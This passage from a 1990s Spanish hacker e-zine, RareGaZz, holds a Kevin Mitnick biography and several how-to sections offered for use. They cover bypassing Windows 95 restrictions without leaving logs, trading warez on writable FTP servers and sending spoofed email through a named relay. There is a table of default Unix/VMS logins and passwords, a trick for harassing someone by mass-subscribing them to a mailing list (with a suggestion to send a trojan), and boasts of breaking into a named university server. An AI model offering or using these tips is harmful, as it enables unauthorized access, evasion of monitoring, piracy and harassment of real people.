F8 cuando aparece el mensaje "Iniciando Windows 95" y seleccionando despues "Solo simbolo de MS-2" accederas al 2. Un metodo no muy bueno, pues muchos administradores desactivan el teclado en el inicio del Windows. - A traves de la pantalla "Ahora puede apagar el equipo" Lo que sucede realmente al apagar el sistema es que Windows se descarga de memoria y presenta el famoso dibujito en la pantalla. Pero he aqui lo importante: Nos deja sobre MS-2. Prueba a escribir "CLS". La pantalla se borrara y aparecera el prompt del 2, en un modo grafico un tanto peculiar. Para ver el prompt en modo de texto, escribe "MODE 80". ¡Podras utilizar el 2 sin problemas! ¡Tu accion no se registrara en los logs del administrador! Un chollo, compadre. :) Hay otros metodos, pero estos son los mejores. Algunos Los corrige MS-PLUS! Si es ese el caso, usa el segundo. Funciona siempre ;) GALAHAD Miembro de Legion Oscura. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ │ │ │ La Historia del Chacal de la Red │ │ │ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ Como Hacker la carrera de Kevin Mitnick comenzo a los 16 años, cuando -obsesionado por las redes de computadoras- rompio la seguridad del sistema administrativo de su colegio. Escrito por: Gilberto Pagua Mr. Mitnick. Todo aquel que sea conceptualizado como un Internauta se caracteriza por utilizar un telefono, un modem y una computadora para muchos fines diferentes: Divertirnos, informarnos, estudiar, cocinar, planificar viajes y otras actividades que amplian nuestro quehacer diario. Para Kevin Mitnick el quehacer diario en sus ultimos diez años fue el explorar y "explotar" computadoras ajenas y sistemas telefonicos. ¿Su profesion? "Hacker" de nacimiento. Este "terrorista electronico", como lo cataloga el Departamento de Justicia de los Estados Unidos, conocido en los medios como el "Condor", fue capaz de crear numeros telefonicos imposibles de facturar (para la compañia telefonica el era James Bond, con un numero que terminaba en 007), pudo apropiarse de 20.000 numeros de tarjetas de credito de habitantes de California y burlarse del FBI por mas de dos años con solo un telefono celular alterado y un computador portatil. Es la peor pesadilla de las empresas de telefonia. Es sospechoso de robar el software de mas de media docena de fabricantes de telefonos celulares y tenia el control de tres oficinas centrales de telefonos en Manhattan y de todos los centros de conmutacion de California, dandole la habilidad de escuchar cualquier conversacion telefonica o, si no eras una persona de su agrado, modificar el telefono de tu casa de tal manera que, cada vez que levantaras el auricular, una grabadora pedia que depositaras 25 centavos. ¿Como se forma un Hacker? Como Hacker, la carrera de Mitnick tiene sus inicios en 1980 cuando apenas contaba 16 años y, obsesionado por las redes de computadoras, rompio la seguridad del sistema administrativo de su colegio, pero no para alterar sus notas, lo hizo "solo para mirar". Su bautizo como infractor de la ley fue en 1981. Junto a dos amigos entro fisicamente a las oficinas de COSMOS de Pacific Bell. COSMOS (Computer System for Mainframe Operations) era una base de datos utilizada por la mayor parte de las compañias telefonicas norteamericanas para controlar el registro de llamadas. Una vez dentro de las oficinas obtuvieron la lista de claves de seguridad, la combinacion de las puertas de acceso de varias sucursales y manuales del sistema COSMOS. La informacion robada tenia un valor equivalente a los 200 mil dolares. Fueron delatados por la novia de uno de los amigos y debido a su minoria de edad una Corte Juvenil lo sentencio a tres meses de carcel y a un año bajo libertad condicional. Luego de cumplido el periodo de tres meses el oficial custodio encargado de su caso encontro que su telefono fue desconectado y que en la compañia telefonica no habia ningun registro de el. Sus objetivos iban creciendo a cada paso y en 1982 entro ilegalmente, via modem, a la computadora del North American Air Defense Command en Colorado. Antes de entrar altero el programa encargado de rastrear la procedencia de las llamadas y desvio el rastro de su llamada a otro lugar. El FBI, creyendo que habia hallado a Mitnick, allano la casa de unos inmigrantes que estaban viendo television. Un año mas tarde fue arrestado de nuevo cuando era estudiante de la Universidad del Sur de California. En esta ocasion entro ilegalmente a ARPAnet (la predecesora de Internet) y trato de accesar a la computadora del Pentagono. Lo sentenciaron a seis meses de carcel en una prision juvenil en California. En 1987, luego de tratar de poner su vida en orden, cayo ante la tentacion y fue acusado, en Santa Cruz California, de invadir el sistema de la compañia Microcorp Systems. Lo sentenciaron a tres años de libertad condicional y luego de la sentencia su expediente desaparecio de la computadora de la policia local. Luego busco trabajo en lo que mejor sabia hacer y solicito empleo en el Security Pacific Bank como encargado de la seguridad de la red del banco. El banco lo rechazo por sus antecedentes penales y Mitnick falsifico un balance general del banco donde se mostraban perdidas por 400 millones de dolares y trato de enviarlo por la red. Afortunadamente el administrador de la red detuvo el balance antes de que viera la luz. Ese mismo año inicio el escandalo que lo lanzo a la fama. Durante meses observo secretamente el correo electronico de los miembros del departamento de seguridad de MCI Communications y Digital Equipment Corporation para conocer como estaban protegidos las computadoras y el sistema telefonico de ambas compañias. Luego de recoger suficiente informacion se apodero de 16 codigos de seguridad de MCI y junto a un amigo, Lenny DiCicco, entraron a la red del laboratorio de investigaciones de Digital Corporation, conocida como Easynet. Ambos Hackers querian obtener una copia del prototipo del nuevo sistema operativo de seguridad de Digital llamado VMS. El personal de seguridad de Digital se dio cuenta inmediatamente del ataque y dieron aviso al FBI, y comenzaron a rastrear a los hackers. Mitnick fue un mal complice y, a pesar de que habian trabajado juntos, trato de echarle toda la culpa a DiCicco haciendo llamadas anonimas al jefe de este que trabajaba en una compañia de software como tecnico de soporte. Lleno de rabia y frustracion DiCicco le confeso todo a su jefe que los denuncio a Digital y al FBI. Mitnick fue arrestado en 1988 por invadir el sistema de Digital Equipment. La empresa acuso a Mitnick y a DiCicco ante un juez federal de causarles daños por 4 millones de dolares en el robo de su sistema operativo. Fue declarado culpable de un cargo de fraude en computadoras y de uno por posesion ilegal de codigos de acceso de larga distancia. Adicional a la sentencia el fiscal obtuvo una orden de la corte que prohibia a Mitnick el uso del telefono en la prision alegando que el prisionero podria obtener acceso a las computadoras a traves de cualquier telefono. A peticion de Mitnick el juez lo autorizo a llamar unicamente a su abogado, a su esposa, a su madre y a su abuela y solo bajo supervision de un oficial de la prision. Este caso produjo revuelo en los Estados Unidos, no solo por el hecho delictivo sino por la tactica que utilizo la defensa. Su abogado convencio al juez que Mitnick sufria de una adiccion por las computadoras equivalente a la de un drogadicto, un alcoholico o un apostador. Gracias a esta maniobra de la defensa Mitnick fue sentenciado a solo un año de prision y al salir de alli debia seguir un programa de seis meses para tratar su "adiccion a las computadoras". Durante su tratamiento le fue prohibido tocar una computadora o un modem y llego a perder mas de 45 kilos. Para 1991 ya era el Hacker que habia ocupado la primera plana del New York Times y uno de sus reporteros, John Markoff, decidio escribir un libro de estilo Cyberpunk narrando las aventuras de Mitnick. Al parecer a Mitnick no le gusto el libro ya que luego de salir a la venta, la cuenta en Internet de Markoff fue invadida, cambiando su nivel de acceso, de manera de que cualquier persona en el mundo conectada a Internet podia ver su correo electronico. En 1992, y luego de concluir su programa, Mitnick comenzo a trabajar en una agencia de detectives. Pronto se descubrio un manejo ilegal en el uso de la base de datos y fue objeto de una investigacion por parte del FBI quien determino que habia violado los terminos de su libertad condicional. Allanaron su casa pero habia desaparecido sin dejar rastro alguno. Ahora Mitnick se habia convertido en un Hacker profugo. El fiscal no estaba tan equivocado cuando pidio la restriccion del uso del telefono. Tambien en 1992, el Departamento de Vehiculos de California ofrecio una recompensa de 1 millon de dolares a quien arrestara a Mitnick por haber tratado de obtener una licencia de conducir de manera fraudulenta, utilizando un codigo de acceso y enviando sus datos via fax. El Fin Luego de convertirse en profugo de la justicia cambio de tactica y concluyo que la mejor manera de no ser rastreado era utilizando telefonos celulares. De esta manera podria cometer sus fechorias y no estar atado a ningun lugar fijo. Para ello necesitaba obtener programas que le permitieran moverse con la misma facilidad con que lo hacia en la red telefonica. Luego de varios intentos infructuosos, en cuanto a calidad de informacion, se encontro con la computadora de Tsutomu Shimomura la cual invadio en la Navidad de 1994. Shimomura, fisico computista y experto en sistemas de seguridad del San Diego Supercomputer Center, era ademas un muy buen Hacker, pero era de los "chicos buenos", ya que cuando hallaba una falla de seguridad en algun sistema lo reportaba a las autoridades, no a otros Hackers. Shimomura noto que alguien habia invadido su computadora en su ausencia, utilizando un metodo de intrusion muy sofisticado y que el nunca antes habia visto. El intruso le habia robado su correo electronico, software para el control de telefonos celulares y varias herramientas de seguridad en Internet. Alli comenzo la cuenta regresiva para Mitnick. Shimomura se propuso como orgullo personal atrapar al Hacker que habia invadido su privacidad. Hacia finales de enero de 1995, el software de Shimomura fue hallado en una cuenta en The Well, un proveedor de Internet en California. Mitnick habia creado una cuenta fantasma en ese proveedor y desde alli utilizaba las herramientas de Shimomura para lanzar ataques hacia una docena de corporaciones de computadoras, entre ellas Motorola, Apple y Qualcomm. Shimomura se reunio con el gerente de The Well y con un tecnico de Sprint (proveedor de servicios telefonicos celulares) y descubrieron que Mitnick habia creado un numero celular fantasma para accesar el sistema. Luego de dos semanas de rastreos determinaron que las llamadas provenian de Raleigh, California. Al llegar Shimomura a Raleigh recibio una llamada del experto en seguridad de InterNex, otro proveedor de Internet en California. Mitnick habia invadido otra vez el sistema de InterNex, habia creado una cuenta de nombre Nancy, borrado una con el nombre Bob y habia cambiado varias claves de seguridad incluyendo la del experto y la del gerente del sistema que posee los privilegios mas altos. De igual manera Shimomura tenia informacion sobre la invasion de Mitcnick a Netcom, una red de base de datos de noticias. Shimomura se comunico con el FBI y estos enviaron a un grupo de rastreo por radio. El equipo de rastreo poseia un simulador de celda, un equipo normalmente utilizado para probar telefonos celulares pero modificado para rastrear el telefono de Mitnick mientras este esta encendido y aunque no este en uso. Con este aparato el celular se convertiria en un transmisor sin que el usuario lo supiera. A medianoche terminaron de colocar los equipos en una Van y comenzo la busqueda de la señal, porque eso era lo que querian localizar; no buscaban a un hombre porque todas las fotos que tenian eran viejas y no estaban seguros de su aspecto actual, el objetivo de esa noche era determinar el lugar de procedencia de la señal. Ya para la madrugada localizaron la señal en un grupo de apartamentos pero no pudieron determinar en cual debido a interferencias en la señal. Mientras esto ocurria la gente de InterNex, The Well y Netcom estaban preocupados por los movimientos que casi simultaneamente Mitnick hacia en cada uno de estos sistemas. Cambiaba claves de acceso que el mismo habia creado y que tenian menos de 12 horas de creadas, utilizando codigos extraños e ironicos como no,panix, fukhood y fuckjkt. Estaba creando nuevas cuentas con mayores niveles de seguridad como si sospechara que lo estaban vigilando. El FBI, Shimomura y el equipo de Sprint se habian reunido para planificar la captura. Shimomura envio un mensaje codificado al buscapersonas del encargado en Netcom para advertirle que el arresto se iba a realizar al dia siguiente, 16 de Febrero. Shimomura envio el mensaje varias veces por equivocacion y el encargado interpreto que Mitnick ya habia sido arrestado adelantandose a realizar una copia de respaldo de todo el material que Mitnick habia almacenado en Netcom como evidencia y borrando las versiones almacenadas por Mitnick. Habia que realizar el arresto de inmediato, antes de que Mitnick se diera cuenta de que su informacion habia sido borrada. Cuando faltaban minutos para dar la orden el simulador de celdas detecto una nueva señal de transmision de datos via celular y simultanea a la de Mitnick, muy cerca de esa zona. Algo extraño estaba haciendo Mitnick con las lineas celulares, Shimomura trato de advertirle al agente del FBI pero ya todo estaba en manos de ellos, Shimomura de ahora en adelante no era mas que un espectador privilegiado. El FBI no pensaban hacer una entrada violenta porque no creian que Mitnick estuviera armado, pero tenian que actuar muy rapido porque sabian el daño que este hombre podia causar en un solo minuto con una computadora. Se acercaron lentamente hasta la entrada del apartamento de Mitnick y anunciaron su presencia, si no les abrian la puerta en cinco segundos la echarian abajo. Mitnick abrio la puerta con toda calma y el FBI procedio a arrestarlo y a decomisar todo el material pertinente discos, computador, telefonos celulares, manuales, etc. De regreso a su hotel Shimomura decide chequear la contestadora telefonica de su residencia en San Diego. Se quedo en una pieza cuando escucho la voz de Mitnick quien le habia dejado varios mensajes con acento oriental en tono de burla. El ultimo de estos mensajes lo habia recibido ocho horas despues de que Mitnick habia sido arrestado y antes de que la prensa se hubiera enterado de todo el asunto. Como se realizo esa llamada aun es un misterio al igual que el origen y objetivo de la segunda señal de Mitnick. Este persistente hacker actualmente esta siendo juzgado y enfrenta dos cargos federales, uso ilegal de equipos de acceso telefonico y fraude por computadoras. Puede ser condenado por hasta 35 años y a pagar una multa de hasta medio millon de dolares. Mitnick tambien es sospechoso de robar el software que las compañias telefonicas piensan usar para todo tipo de procesos, desde la facturacion hasta el seguimiento del origen de una llamada pasando por la decodificacion de las señales de los telefonos celulares para preservar su privacidad. El vuelo final Todos los cargos bajo los cuales ha sido acusado Kevin Mitnick podrian suponerle mas de doscientos años de prision si es declarado culpable "No culpable" alcanzo a declararse Kevin Mitnick ante el Gran Jurado de California, que el pasado 30 de septiembre lo acuso de 25 cargos por los cuales podria ser condenado a mas de doscientos años de presidio. "Esta acusacion revela el amplio daño que Mitnick causo mientras era un fugitivo de la justicia. Los delitos por computadora permiten a sofisticados criminales causar estragos alrededor del mundo usando solo una computadora y un modem como sus armas. Queremos con esta acusacion dar un paso adelante en los esfuerzos federales por perseguir y capturar a los hackers" dijo la fiscal encargada del caso, Nora Manella. Los cargos por los que fue acusado Mitnick y su ayudante Lewis Depayne, de 36 años, incluyen el robo de software, fraude electronico, daño a las computadoras de la Universidad del Sur de California, robo de archivos electronicos e intercepcion de mensajes de correo electronico. Entre las compañias afectadas por las actividades del llamado "Condor" se cuentan Motorola, Nokia, Fujitsu y Nec. Se supone que los daños causados por Mitnick en los dos años y medio durante los cuales fue un fugitivo suman millones de dolares, especialmente por el software robado y las inversiones que debieron realizar las empresas para proteger sus sistemas. El asistente del fiscal David Schindler dijo que Mitnick -quien actualmente tiene 33 años- seria probablemente sentenciado a "muchos años" si es encontrado culpable, negandose, sin embargo, a ser mas especifico, bajo el argumento de que se trata de un area legal muy nueva. Todos los cargos bajo los cuales ha sido acusado Mitnick podrian suponerle mas de doscientos años de prision si es declarado culpable de todos ellos. Ya en abril de este año el famoso hacker habia sido declarado culpable por un jurado de Carolina del Norte por el uso del quince numeros de telefonos celulares robados para llamar a bases de datos electronicas. Igualmente se le condeno por haber violado el regimen de libertad condicional al que estaba sometido luego de ser encontrado culpable de penetrar ilegalmente en sistemas de informacion de corporaciones de informatica. Mitnick: hacker, cracker y phone phreaker La definicion de un cracker es alguien que trata de violar el acceso a un sistema adquiriendo passwords. La mayoria de los crackers son adolescentes nada bondadosos y que buscan dar sus golpes destruyendo o alterando la data de un sistema. Tienden a unirse en grupos muy pequeños, secretos y cerrados al contrario de los inmensos, abierto y policulturales hackers. Se espera que un verdadero hacker haga algo de crackin jugueton y conozca muchas de las tecnicas basicas, pero cualquiera que pase de la etapa de larva puede caer en la tentacion y, debido a su creciente deseo de realizar algo por razones inmediatas, benignas y practicas, no vea nada de malo en invadir cierta seguridad y privacidad para poder lograr una meta. Para el cracker el invadir un sistema no requiere de misteriosos estados de iluminacion mental, pero si mucha persistencia y la testaruda repeticion de trucos bien conocidos en los puntos debiles de un sistema, tratan de descubrir informacion clasificada hurgando al azar y con ciega persistencia. Suele decirse que los crackers son solo hackers mediocres y que su nivel de educacion e inteligencia sobre un sistema es menor. Los phone phreaker son los mas famosos en los medios de comunicacion por los desastres que han hecho a traves de los años. En los años 60 ya existian los Phone Phreaks y la gran victima era AT&T. Uno de los mas famosos Phone Phreaks de esa epoca era John Draper, alias Captain Crunch (http://www.fc.net/phrack.html). El descubrio que modificando una caja de cereal podia producir el silbido que simulaba un tono de 2600 Hz para desbloquear el acceso a una troncal y poder hacer llamadas internacionales gratis. Hace algun tiempo el hacer phreaking fue una actividad semi-respetable dentro de la comunidad hacker; habia un acuerdo de caballeros donde el hacer phreaking era bien visto como juego intelectual y como una forma de exploracion, pero el robo de servicios era tabu. La modernizacion de las redes hizo necesario que los phreakers utilizaran tecnicas menos eticas, como robar numeros de calling cards: los obtenian colocandose cerca de algun telefono publico y memorizando el numero de tarjeta que marcaba un usuario descuidado, una vez obtenido el numero y la clave la informacion era esparcida de tal manera que en un caso se llegaron a realizar 600 llamadas internacionales en dos minutos antes de que los operadores de seguridad del sistema la cancelaran. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ▓▓░ ▓▓▓▓▓▓░ ▓▓▓▓▓▓░ ▓▓▓▓▓▓░ ▓▓░ ▓▓░ ▓▓▓▓▓░ ▓▓▓▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░▓▓░ ▓▓░ ▓▓▓▓░ ▓▓░ ▓▓░ ▓▓▓▓▓▓▓░ ▓▓▓▓▓▓▓░ ▓▓░ ▓░▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░▓▓░ ▓▓▓▓▓▓▓░ ▓▓▓▓▓▓░ ▓▓░ ▓▓▓▓▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓░ ▓▓▓▓▓░ ▓▓░ ▓▓░ "If eating animals is wrong, how come they are made of meat?" -David Letterman [ La seccion de LETZ HACK! ha sido donada a los miembros de RdK que actualmente no se han interesado en participar en la revista de forma permanente por sus deseos de seguir UnderGround y temor a represalias. ] INTERCAMBIANDO ARCHIVOS ENTRE HACKERS ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ Si quieres conseguir WareZ o copiar archivos entre hackers puedes usar los FTP'S que aceptan escritura en directorios como /incoming /tmp /temp Uno de los FTP que en este momento se encuentra activo como WareZ Trade FTP oficial es ftp.cincos.net ftp.cincos.net Login: anonymous Password: guest Este servidor nos deja escribir en el directorio /incoming Asegurense de checar el WAREZ en esos directorios sobre todo las versiones completas de los siguientes programas McAffe 95 ---> /incoming/alf/MCCAFEE95.EXE PcCillin 95 ---> /incoming/alf/pcc.zip Como ustedes deben saber, cualquiera puede borrar esos archivos pero si a alguien se le ocurre hacerlo nosotros mismos (RdK) buscaremos en los LOGS sus direcciones IP y los haremos arrepentirse el resto de sus vidas asi que evitense problemas y disfruten estos maravillosos programas que han sido copiados a estos directorios por algun WareZ D00d que se tomo el tiempo de hacerlo asi que respetemos su trabajo. EMAIL FALSO SIN DIRECCIONES IP ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ Cuando explicaron en los numeros anteriores como mandar email falso mencionaron la importancia de no abusar del email falso ya que las direcciones IP quedaban grabadas en los mensajes y un usuario con experiencia podria rastrearlos sin problemas. En este numero hacemos un UPDATE a ese articulo mencionando el siguiente servidor de correo que nos permite enviar email sin imprimir nuestra direccion IP en el mensaje. televisa.com.mx Asi es, nuestros queridos amigos de televisa (sic) nos permiten enviar correo falso sin revelar nuestras direcciones IP. Para saber como hacerlo consulta el articulo Trucos con E-mail que aparece en el primer numero de RareGaZz. Tengan cuidado por que probablemente pronto televisa deje de ofrecer este servicio y pueden meterse en problemas. Como siempre primero verifiquen. DEFAULTS PARA UNIX ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ Login Login Login Login Login ~~~~~ ~~~~~ ~~~~~ ~~~~~ ~~~~~ GUEST uucp system trouble veal guest ssck backup sysdiag geac notes user remote startup vax getty sys5 decnet sysmait vms setup news ingres systest help admin iris mailer umountssys link games mait netcon postmaster mail userp oper netmgr lp priv field usrc oracle rje test fault host mountssys msgs decmail unix vlsi checkssys sccs digital makesys operator powerdown asg library sysadmin helpdesk netserver tty netpriv sysmaint teledemo report bbx network sysman listen reports dcl opervax finger daemon uucpadm sas student manager Las cuentas anteriores no tienen password o es el mismo login ┌────────────┬──────────┐┌────────────┬──────────┐ │ Default │ Password ││ Default │ Password │ ├────────────┼──────────┤├────────────┼──────────┤ │decnet │ddennet ││guest │friend │ │field │service ││guest │welcome │ │system │manager ││default │user │ │decnet │nonpriv ││field │digital │ │field │test ││netnonpriv │nonpriv │ │postmaster │mail ││sysmaint │service │ │sysmaint │digital ││system │operator │ │system │manager ││system │syslib │ │system │uetp ││systest_clig│systest │ │userp │user ││ │ │ └────────────┴──────────┘└────────────┴──────────┘ Causando PaniKo en la red ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ Cuando sepas que alguna persona que no es de tu agrado va a estar fuera de la red por algun tiempo lo mejor que puedes hacer es subscribirlo a una lista de correo de gran volumen. Existe una llamada CYPHERPUNKS y para subscribir a alguien solo es necesario que envies un mensaje desde la direccion que deseas subscribir a la direccion MAJORDOMO@TOAD.COM con el comando en el cuerpo del mensaje: subscribe cypherpunks Puedes mandarle un troya y cuando sepas que lo ha ejecutado subscribelo y cuando regresa va encontrar cientos de mensajes >:-) [ Whoa! estos chamacos del RdK me sorprenden, cuando yo inicie con ellos eramos 4 o 5 y ahora tienen 22 miembros dedicados enteramente a causar kaos en sistemas mexicanos. Por lo pronto yo -raretrip- sigo siendo miembro con la diferencia que hago hacking por mi cuenta...como debe ser! ] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- -= Nuevas Tecnologias =- Java, Activex, Javascripts, etc. Ahora los navegadores soportan gran variedad de tecnologias que nos permiten una interaccion mas intima entre nosotros y el sitio que visitamos pero a su vez ponen en peligro la seguridad de los datos de nuestra computadora y la privacidad de nuestro origen. Secreto no es para nadie que usando un Applet Java se puede dañar un archivo o el disco entero, asi como tambien con Activex. Ahora con las nuevas tecnologias la modificacion de un archivo sin que el usuario se de cuenta resulta facil de realizar y hasta divertido. Existe un servicio en la red que nos permite revisar los controladores de nuestro sistema internamente (en caso de ser windows95) y cambiar las versiones viejas por nuevas todo esto simplemente visitando una pagina Web. Esta es una aplicacion Benigna de las nuevas tecnologias pero imaginemonos el reemplaso de un archivo con un troya o virus...¿Que nos protegeria? El site del que hablo necesita un software que lo puedes conseguir en la siguiente direccion: http://www.cybermedia.com Escrito por ??????@orca.ens.cetys.mx para RareGaZz -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈ ≈ CTRL + ALT +DEL ≈ ≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈ "Y Dios dijo...¡QUE SE HAGA LA LUZ! Y pidio a RareTrip que moviera el switch. Y vio Dios que la luz era buena y separo la luz de las tinieblas.Y llamo Dios a la luz RareGaZz y a las tinieblas lo demas..." -Libro del Genesis, capitulo escondido. Bienvenidos a la primera aparicion de la seccion CTRL+ALT+DEL que busca reunir las dudas que ustedes nos hacen llegar por email y ponerlas a dispocision de todos para que entre todos sigamos adelante. John Lenon ya lo dijo antes 'Get together right now...over me.' * ballena.ens.cetys.mx * Hola, les escribo para hacerles saber que hemos abierto otro site del cetys campus ensenada y estamos esperando que algunos hackers prueben la seguridad para tener un website seguro. gracias. [ Aja! con que nos quieren agarrar con las manos en la masa. Pues nosotros aqui en RareGaZz no estamos interesados, ya logramos entrar a su sistema orca.ens.cetys.mx con facilidad y hasta platique usando su sistema de chat con el operador del sistema mencionandole sus errores asi que se me ocurre que tal vez esten esperando a algun hacker novato. El administrador de orca es lecuanda@orca.ens.cetys.mx por si quieres verificar que ya entre a su sistema y hasta platique con el. ] ¿RdK es una broma? Para nada, somos un grupo de terroristas -si asi es- encargados de causar KaoS en los sistemas mexicanos reclamando democracia, libertad politica y sobre todo una mayor apertura a los grupos sociales como Rdk en los medios de comunicacion para transmitir nuestras ideas. ¿Podran ser Detenidos? ¡NO WAY JOSE! Quizas puedan con uno pero con todos nosotros Nunca. Dia a dia se unen al equipo mas personas y esta es una bola de nieve que jamas podra ser detenida. Eso si, algun dia yo me retirare de la edicion de la revista y se la pasare a la persona en la que tenga mayor confianza en esos momentos pero por ahora seguire como hasta ahora y claro tratando de mejorar. ¿Quien es RareTrip, KillerBot, LePompeItor y Mr. X? Son el todo reunido en la nada con un proposito similar pero no igual :-) Lo siento pero no puedo decir esas cosas, tal vez luego me den permiso de mencionar las direcciones email con las que mantengo contacto con ellos. ¿Cada cuanto tiempo aparece RareGaZz? Cuando esta terminado y punto. Si quieres ser avisado puedes unirte a la lista de correo para tu comodidad pero para la nuestra, deja de enviar correo preguntando por el proximo numero. ¿Que pasa cuando envio e-mail a RareGaZz? Cuando envias un mensaje a las direcciones de RareGaZz terminara en una direccion de Hotmail por lo que unicamente los que conocemos la clave podemos leerlo. La clave es conocida en este momento unicamente por Mr.X KillerBot, LepompeItor y RareTrip. Gracias a las caracteristicas de Hotmail nosotros podemos saber cuando revisamos correo si alguno ya ha sido leido y por un acuerdo de nosotros, cuando se revise correo debera ser contestado para evitar que se pierdan sus mensajes. Ademas no son borrados de Hotmail a menos que los mensajes carezcan de importancia o el mensaje asi lo pida. ¿Como se generan los scripts para Debug como en el primer numero? Bueno, para hacer esto me hice de una copia del archivo DBGSCRPT.COM escrito por NowhereMan y viene incluido en las Nowhere Utilities (NUTILS20.ZIP) disponible en la mayoria de las paginas de Hackers y ahora tambien en la de RareGaZz. El Link para llegar a estas utilidades es: http://www.geocities.com/Baja/4426/NUTILS20.ZIP O visita la seccion de WareZ y alli estara el Link para bajar el archivo. ¿Que puedo hacer para ayudar a la revista? Envianos textos, comentarios, links a paginas interesantes, passwds, noticias sobre el Underground de tu localidad, etc. Cualquiera puede ayudar y le estaremos muy agradecidos. Sin mencionar que sera añadido a la lista de cool people que conocemos... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- -= Primer Concurso de RareGaZz =- Este concurso consiste en crear un INTRO o archivo ASCII/ANSI para promover nuestra revista en diferentes paquetes de software. Para el ganador o ganadores habra paquetes de software con gran valor y ademas una camiseta con graficas a colores cortesia de RareGaZz. Ninguno de los encargados de la revista puede participar asi como los miembros de RdK por ser amigos del encargado del concurso. Requisitos: -El trabajo no debera ser mayor de 18 centimetros de alto y 10 de ancho (18x10) -En el caso de trabajos ASCII/ANSI- -En el caso de un programa INTRO podra incluir sonido y todas las cosas que quieras siempre y cuando no pase de los 70k. -Si es un INTRO incluye las especificaciones minimas de un sistema para poder ejecutar el programa. -Si programas un INTRO deberas incluir tambien el codigo fuente con instrucciones precisas para compilarlo. -Los intros podran estar programados en cualquier lenguaje y no deben ser de mas de un archivo. -El archivo o programa debera crear la palabra RareGaZz de la manera mas llamativa posible, incluyendo colores (ansi) o sin ellos (ascii). -El archivo *NO* debera incluir el nombre del programador a menos que este se encuentre en el codigo interno del programa. -Deberas entregar el trabajo en archivo ZIP con tu direccion de e-mail unicamente como informacion personal. -No hagas el trabajo bajo ningun pseudonimo ya que en caso de resultar ganador necesitariamos tu direccion para enviarte los premios. Premios: -Una camiseta blanca con la palabra RareGaZz en tamaño grande por la parte de atras y en la parte superior izquierda con letras pequeñas la leyenda "UNIX LOVER" debajo de la grafica de nuestro WebSite. -Un paquete de Diskettes conteniendo WareZ como PcCillin95, McAffee95, Autocad Pro (*), PGPFONE, PGP, Software de comunicaciones Bitware, Netscape GOLD con Plugins CoolTalk, Live3d, Java, RealAudio y RealMovie. Quicktime para Windows, C++, Pascal, Turbo Assembler (*), entre otros. -La inclusion automatica a la lista de correo RareDudeZ que informa sobre sistemas debiles en la republica y passwords existentes! (*) Estos programas pueden o no estar incluidos. Cada persona puede participar con 3 creaciones que pueden ser las que el eliga, por ejemplo 1 ascii-1 ansi y 1 intro o 3 intros, o 2 ansi y un intro, etc. Envia tus participaciones ¡AHORA! La fecha limite para enviarlas es primero de septiembre de 1997. El ganador se dara a conocer 15 dias despues. Para enviar trabajos comprimelos a un zip y codificalos con UUENCODE que viene incluido en el primer numero de la revista con el siguiente comando: UUENCODE ARCHIVO.ZIP Si el comando crea mas de un archivo .UUE elabora un mensaje para cada uno y escribe en el subject claramente que numero de archivo es cada mensaje. Todos los programas o archivos participantes estaran a disposicion del mundo entero en nuestra Home Page a menos que el creador especifique lo contrario. Si tienes dudas escribe preguntando pero no dejes de participar, los premios y el reconocimiento que recibiras valen la pena el esfuerzo. RareGaZz ~~~~~~~~ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- Editor: RareTrip Colaboradores: KillerBot, Mr.X, Raven Spirit, DuvaHazard, Dark Raver, RdK. Color: YourEyesAreCrazy (c) incorporated Entusiasmo: http://www.AlotOfSeX.com.mx Proveedor: Cartel de Cali, entre otros. Cool People: ThunderStorm, CyberCrash, Azteca y 